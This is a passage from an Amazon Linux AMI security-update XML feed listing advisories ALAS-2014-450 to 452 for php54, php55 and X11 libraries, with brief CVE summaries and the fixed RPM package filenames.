arch="noarch"><filename>Packages/rubygems21-2.2.2-1.15.amzn1.noarch.rpm</filename></package><package name="ruby21-devel" version="2.1.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.5-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" 
version="2.1.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.5-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.15.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.5-1.15.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.5-1.15.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.15.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.2" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.2-1.15.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.5-1.15.amzn1.i686.rpm</filename></package><package name="ruby21-libs" version="2.1.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.5-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-450</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-450: medium priority package update for php54</title><issued date="2014-11-22 13:58:00" /><updated date="2014-11-22 14:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3710:
An out-of-bounds read flaw was found in the way the File Information (fileinfo) extension parsed Executable and Linkable Format (ELF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted ELF file.
1155071:
CVE-2014-3710 file: out-of-bounds read in elf note headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710" title="" id="CVE-2014-3710" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-imap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.35" 
release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package 
name="php54-mysql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.35" release="1.63.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-mysql-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.35" release="1.63.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-cli-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.35" release="1.63.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-embedded-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.35-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-451</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-451: medium priority package update for php55</title><issued date="2014-11-22 13:58:00" /><updated date="2014-11-22 14:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3710:
An out-of-bounds read flaw was found in the way the File Information (fileinfo) extension parsed Executable and Linkable Format (ELF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted ELF file.
1155071:
CVE-2014-3710 file: out-of-bounds read in elf note headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710" title="" id="CVE-2014-3710" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-snmp" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.19" release="2.93.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-pdo-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" 
version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.19" release="2.93.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-gd-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.19" release="2.93.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-bcmath-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.19" release="2.93.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-ldap-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.19-2.93.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-452</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-452: medium priority package update for libX11 libXcursor libXfixes libXi libXrandr libXrender libXres libXt libXv libXvMC libXxf86dga libXxf86vm libdmx xorg-x11-proto-devel</title><issued date="2014-11-22 14:00:00" /><updated date="2014-11-24 15:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2066:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-2064:
Integer overflow in X.org libxcb 1.9 and earlier allows X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the read_packet function.
960367:
CVE-2013-2064 libxcb: Integer overflow leading to heap-based buffer overflow
CVE-2013-2062:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-2005:
A flaw was found in the way the X.Org X11 libXt runtime library used uninitialized pointers. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-2004:
Two stack-based buffer overflow flaws were found in the way libX11, the Core X11 protocol client library, processed certain user-specified files. A malicious X11 server could possibly use this flaw to crash an X11 client via a specially crafted file.
CVE-2013-2003:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-2002:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-2001:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-2000:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1999:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1998:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1997:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1995:
A buffer overflow flaw was found in the way the XListInputDevices() function of X.Org X11's libXi runtime library handled signed numbers. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1991:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1990:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1989:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1988:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1987:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1986:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1985:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1984:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1983:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1982:
Multiple integer overflows in X.org libXext 1.3.1 and earlier allow X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the (1) XcupGetReservedColormapEntries, (2) XcupStoreColors, (3) XdbeGetVisualInfo, (4) XeviGetVisualInfo, (5) XShapeGetRectangles, and (6) XSyncListSystemCounters functions.
959046:
CVE-2013-1982 libXext: Multiple integer overflows leading to heap-based buffer-overflows
CVE-2013-1981:
